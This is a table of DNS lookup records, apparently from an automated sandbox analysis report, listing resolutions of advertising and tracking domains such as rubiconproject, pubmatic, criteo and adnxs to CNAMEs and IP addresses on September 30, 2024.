                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.810121059 CEST1.1.1.1192.168.2.40x769eNo error (0)ssp.disqus.comzeta-ssp-385516103.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.810121059 CEST1.1.1.1192.168.2.40x769eNo error (0)zeta-ssp-385516103.us-east-1.elb.amazonaws.com3.95.52.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.810121059 CEST1.1.1.1192.168.2.40x769eNo error (0)zeta-ssp-385516103.us-east-1.elb.amazonaws.com52.205.197.165A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.810121059 CEST1.1.1.1192.168.2.40x769eNo error (0)zeta-ssp-385516103.us-east-1.elb.amazonaws.com54.85.1.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.810121059 CEST1.1.1.1192.168.2.40x769eNo error (0)zeta-ssp-385516103.us-east-1.elb.amazonaws.com44.207.69.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.810121059 CEST1.1.1.1192.168.2.40x769eNo error (0)zeta-ssp-385516103.us-east-1.elb.amazonaws.com44.205.93.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.810121059 CEST1.1.1.1192.168.2.40x769eNo error (0)zeta-ssp-385516103.us-east-1.elb.amazonaws.com3.225.117.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.810121059 CEST1.1.1.1192.168.2.40x769eNo error (0)zeta-ssp-385516103.us-east-1.elb.amazonaws.com34.192.178.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.810121059 CEST1.1.1.1192.168.2.40x769eNo error (0)zeta-ssp-385516103.us-east-1.elb.amazonaws.com3.225.24.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.818751097 CEST1.1.1.1192.168.2.40x5981No error (0)yahoo-match.dotomi.combfp.global.dual.dotomi.weighted.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.823412895 CEST1.1.1.1192.168.2.40x427No error (0)ssp.disqus.comzeta-ssp-385516103.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.832716942 CEST1.1.1.1192.168.2.40xad1fNo error (0)yahoo-match.dotomi.combfp.global.dual.dotomi.weighted.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.948528051 CEST1.1.1.1192.168.2.40xd3fdNo error (0)rtb.gumgum.com46.137.58.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.948528051 CEST1.1.1.1192.168.2.40xd3fdNo error (0)rtb.gumgum.com52.17.180.203A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.948528051 CEST1.1.1.1192.168.2.40xd3fdNo error (0)rtb.gumgum.com54.77.143.176A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.948528051 CEST1.1.1.1192.168.2.40xd3fdNo error (0)rtb.gumgum.com52.31.202.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.948528051 CEST1.1.1.1192.168.2.40xd3fdNo error (0)rtb.gumgum.com52.212.210.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.948528051 CEST1.1.1.1192.168.2.40xd3fdNo error (0)rtb.gumgum.com52.31.253.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.948528051 CEST1.1.1.1192.168.2.40xd3fdNo error (0)rtb.gumgum.com52.212.222.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.948528051 CEST1.1.1.1192.168.2.40xd3fdNo error (0)rtb.gumgum.com54.76.105.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.039805889 CEST1.1.1.1192.168.2.40xc807No error (0)beacon-ams3.rubiconproject.combeacon-ams3.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.040570021 CEST1.1.1.1192.168.2.40x11c9No error (0)beacon-ams3.rubiconproject.combeacon-ams3.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.047441959 CEST1.1.1.1192.168.2.40x2db7No error (0)s.yimg.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.047441959 CEST1.1.1.1192.168.2.40x2db7No error (0)edge.gycpi.b.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.047441959 CEST1.1.1.1192.168.2.40x2db7No error (0)edge.gycpi.b.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.047985077 CEST1.1.1.1192.168.2.40xaec0No error (0)s.yimg.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.277990103 CEST1.1.1.1192.168.2.40x8101No error (0)aax-eu.amazon-adsystem.com52.95.126.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.591505051 CEST1.1.1.1192.168.2.40x3e97No error (0)cr.frontend.weborama.fr34.111.129.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.591592073 CEST1.1.1.1192.168.2.40x160No error (0)sync.crwdcntrl.net52.19.187.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.591592073 CEST1.1.1.1192.168.2.40x160No error (0)sync.crwdcntrl.net54.216.230.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.591592073 CEST1.1.1.1192.168.2.40x160No error (0)sync.crwdcntrl.net54.74.215.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.591592073 CEST1.1.1.1192.168.2.40x160No error (0)sync.crwdcntrl.net54.171.123.149A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.591592073 CEST1.1.1.1192.168.2.40x160No error (0)sync.crwdcntrl.net52.211.255.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.591592073 CEST1.1.1.1192.168.2.40x160No error (0)sync.crwdcntrl.net34.251.185.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.591592073 CEST1.1.1.1192.168.2.40x160No error (0)sync.crwdcntrl.net54.78.53.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.591592073 CEST1.1.1.1192.168.2.40x160No error (0)sync.crwdcntrl.net54.76.166.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.591969013 CEST1.1.1.1192.168.2.40xeaaeNo error (0)mwzeom.zeotap.com104.22.51.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.591969013 CEST1.1.1.1192.168.2.40xeaaeNo error (0)mwzeom.zeotap.com104.22.50.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.591969013 CEST1.1.1.1192.168.2.40xeaaeNo error (0)mwzeom.zeotap.com172.67.40.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.592842102 CEST1.1.1.1192.168.2.40x4c36No error (0)um.simpli.fi34.91.62.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.592842102 CEST1.1.1.1192.168.2.40x4c36No error (0)um.simpli.fi35.204.158.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.592842102 CEST1.1.1.1192.168.2.40x4c36No error (0)um.simpli.fi35.204.74.118A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.592852116 CEST1.1.1.1192.168.2.40xaf55No error (0)qsearch-a.akamaihd.netqsearch-a.akamaihd.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.593035936 CEST1.1.1.1192.168.2.40x542aNo error (0)static.criteo.netstatic.nl3.vip.prod.criteo.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.593035936 CEST1.1.1.1192.168.2.40x542aNo error (0)static.nl3.vip.prod.criteo.net178.250.1.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.593055010 CEST1.1.1.1192.168.2.40x634eNo error (0)pr-bh.ybp.yahoo.comds-pr-bh.ybp.gysm.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.593055010 CEST1.1.1.1192.168.2.40x634eNo error (0)ds-pr-bh.ybp.gysm.yahoodns.net54.194.192.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.593055010 CEST1.1.1.1192.168.2.40x634eNo error (0)ds-pr-bh.ybp.gysm.yahoodns.net99.81.213.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.593055010 CEST1.1.1.1192.168.2.40x634eNo error (0)ds-pr-bh.ybp.gysm.yahoodns.net52.30.164.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.593055010 CEST1.1.1.1192.168.2.40x634eNo error (0)ds-pr-bh.ybp.gysm.yahoodns.net54.75.24.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.593055010 CEST1.1.1.1192.168.2.40x634eNo error (0)ds-pr-bh.ybp.gysm.yahoodns.net52.211.133.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.593064070 CEST1.1.1.1192.168.2.40x9206No error (0)pr-bh.ybp.yahoo.comds-pr-bh.ybp.gysm.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.593071938 CEST1.1.1.1192.168.2.40x2041No error (0)image6.pubmatic.comimage6v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.593071938 CEST1.1.1.1192.168.2.40x2041No error (0)image6v2.pubmnet.compugm-lhrc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.593071938 CEST1.1.1.1192.168.2.40x2041No error (0)pugm-lhrc.pubmnet.com185.64.190.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.593106985 CEST1.1.1.1192.168.2.40xdbf8No error (0)uipglob.semasio.netuipglob.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.593206882 CEST1.1.1.1192.168.2.40xe83bNo error (0)ads.yieldmo.comrw.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.593206882 CEST1.1.1.1192.168.2.40xe83bNo error (0)rw.yieldmo.comgdpr.rw.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.593206882 CEST1.1.1.1192.168.2.40xe83bNo error (0)gdpr.rw.yieldmo.comrw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.593206882 CEST1.1.1.1192.168.2.40xe83bNo error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com63.32.50.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.593206882 CEST1.1.1.1192.168.2.40xe83bNo error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com54.75.182.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.593206882 CEST1.1.1.1192.168.2.40xe83bNo error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com52.49.117.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.593206882 CEST1.1.1.1192.168.2.40xe83bNo error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com52.209.79.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.593206882 CEST1.1.1.1192.168.2.40xe83bNo error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com34.250.181.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.593206882 CEST1.1.1.1192.168.2.40xe83bNo error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com63.34.124.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.593206882 CEST1.1.1.1192.168.2.40xe83bNo error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com54.194.52.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.593206882 CEST1.1.1.1192.168.2.40xe83bNo error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com52.31.240.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.593216896 CEST1.1.1.1192.168.2.40x6396No error (0)token.rubiconproject.compixel.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.593285084 CEST1.1.1.1192.168.2.40x3a1dNo error (0)eb2.3lift.comeu-eb2.3lift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.593542099 CEST1.1.1.1192.168.2.40x9364No error (0)image6.pubmatic.comimage6v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.593542099 CEST1.1.1.1192.168.2.40x9364No error (0)image6v2.pubmnet.compugm-lhrc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.593558073 CEST1.1.1.1192.168.2.40x6cf5No error (0)smarttag.rubiconproject.comtagged-by.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.593574047 CEST1.1.1.1192.168.2.40xa8d2No error (0)us-u.openx.net34.98.64.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.593574047 CEST1.1.1.1192.168.2.40xa8d2No error (0)us-u.openx.net35.244.159.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.593600035 CEST1.1.1.1192.168.2.40xd4d0No error (0)eb2.3lift.comeu-eb2.3lift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.593600035 CEST1.1.1.1192.168.2.40xd4d0No error (0)eu-eb2.3lift.com76.223.111.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.593600035 CEST1.1.1.1192.168.2.40xd4d0No error (0)eu-eb2.3lift.com13.248.245.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.593615055 CEST1.1.1.1192.168.2.40xa803No error (0)static.criteo.netstatic.nl3.vip.prod.criteo.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.593791962 CEST1.1.1.1192.168.2.40x507eNo error (0)token.rubiconproject.compixel.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.593908072 CEST1.1.1.1192.168.2.40xd2e4No error (0)smarttag.rubiconproject.comtagged-by.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.593916893 CEST1.1.1.1192.168.2.40xb84aNo error (0)mwzeom.zeotap.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.593920946 CEST1.1.1.1192.168.2.40x593cNo error (0)qsearch-a.akamaihd.netqsearch-a.akamaihd.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.594454050 CEST1.1.1.1192.168.2.40xedc7No error (0)ads.yieldmo.comrw.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.594454050 CEST1.1.1.1192.168.2.40xedc7No error (0)rw.yieldmo.comgdpr.rw.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.594454050 CEST1.1.1.1192.168.2.40xedc7No error (0)gdpr.rw.yieldmo.comrw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.597296953 CEST1.1.1.1192.168.2.40xfb59No error (0)uipglob.semasio.netuipglob.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.597296953 CEST1.1.1.1192.168.2.40xfb59No error (0)uip.semasio.net77.243.51.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.597296953 CEST1.1.1.1192.168.2.40xfb59No error (0)uip.semasio.net77.243.51.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.924611092 CEST1.1.1.1192.168.2.40x14d9No error (0)sync.adkernel.com1.cpm.ak-is2.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.924757004 CEST1.1.1.1192.168.2.40x8e58No error (0)sync.adkernel.com1.cpm.ak-is2.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.924757004 CEST1.1.1.1192.168.2.40x8e58No error (0)1.cpm.ak-is2.net103.67.200.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:26.258147001 CEST1.1.1.1192.168.2.40x19edNo error (0)simage2.pubmatic.comsimage2v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:26.258147001 CEST1.1.1.1192.168.2.40x19edNo error (0)simage2v2.pubmnet.compug-lhr-bc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:26.258147001 CEST1.1.1.1192.168.2.40x19edNo error (0)pug-lhr-bc.pubmnet.com185.64.191.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:26.259691000 CEST1.1.1.1192.168.2.40xd687No error (0)simage2.pubmatic.comsimage2v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:26.259691000 CEST1.1.1.1192.168.2.40xd687No error (0)simage2v2.pubmnet.compug-ams-bc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:26.781846046 CEST1.1.1.1192.168.2.40xa771No error (0)c1.adform.nettrack.adformnet.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:26.782008886 CEST1.1.1.1192.168.2.40x27eNo error (0)c1.adform.nettrack.adformnet.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:26.819308043 CEST1.1.1.1192.168.2.40xe621No error (0)uipus.semasio.net50.57.31.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:26.820286036 CEST1.1.1.1192.168.2.40x3ed1No error (0)image2.pubmatic.comimage2v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:26.820286036 CEST1.1.1.1192.168.2.40x3ed1No error (0)image2v2.pubmnet.compug-ams-bc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:26.820286036 CEST1.1.1.1192.168.2.40x3ed1No error (0)pug-ams-bc.pubmnet.com198.47.127.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:26.820647955 CEST1.1.1.1192.168.2.40x424aNo error (0)image2.pubmatic.comimage2v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:26.820647955 CEST1.1.1.1192.168.2.40x424aNo error (0)image2v2.pubmnet.compug-lhr-bc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.305107117 CEST1.1.1.1192.168.2.40x3ad3No error (0)sync.targeting.unrulymedia.comsync.1rx.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.305107117 CEST1.1.1.1192.168.2.40x3ad3No error (0)sync.1rx.io46.228.174.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.305409908 CEST1.1.1.1192.168.2.40x49c0No error (0)pixel.rubiconproject.compixel.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.305644989 CEST1.1.1.1192.168.2.40x6b5No error (0)creativecdn.com185.184.8.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.305655956 CEST1.1.1.1192.168.2.40x297dNo error (0)sync.targeting.unrulymedia.comsync.1rx.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.306569099 CEST1.1.1.1192.168.2.40xb1e0No error (0)pixel.rubiconproject.compixel.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.477087975 CEST1.1.1.1192.168.2.40x7107No error (0)secure.adnxs.comxandr-g-geo.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.477087975 CEST1.1.1.1192.168.2.40x7107No error (0)ib.anycast.adnxs.com185.89.211.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.477087975 CEST1.1.1.1192.168.2.40x7107No error (0)ib.anycast.adnxs.com185.89.210.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.477087975 CEST1.1.1.1192.168.2.40x7107No error (0)ib.anycast.adnxs.com185.89.210.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.477087975 CEST1.1.1.1192.168.2.40x7107No error (0)ib.anycast.adnxs.com185.89.210.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.477087975 CEST1.1.1.1192.168.2.40x7107No error (0)ib.anycast.adnxs.com185.89.210.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.477087975 CEST1.1.1.1192.168.2.40x7107No error (0)ib.anycast.adnxs.com185.89.210.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.477087975 CEST1.1.1.1192.168.2.40x7107No error (0)ib.anycast.adnxs.com185.89.210.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.477087975 CEST1.1.1.1192.168.2.40x7107No error (0)ib.anycast.adnxs.com185.89.211.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.477087975 CEST1.1.1.1192.168.2.40x7107No error (0)ib.anycast.adnxs.com185.89.210.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.477087975 CEST1.1.1.1192.168.2.40x7107No error (0)ib.anycast.adnxs.com185.89.210.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.477087975 CEST1.1.1.1192.168.2.40x7107No error (0)ib.anycast.adnxs.com185.89.210.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.477087975 CEST1.1.1.1192.168.2.40x7107No error (0)ib.anycast.adnxs.com185.89.210.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.512864113 CEST1.1.1.1192.168.2.40xb9a3No error (0)ups.analytics.yahoo.comprod.ups-ats.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.512864113 CEST1.1.1.1192.168.2.40xb9a3No error (0)prod.ups-ats.aolp-ds-prd.aws.oath.cloudprod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
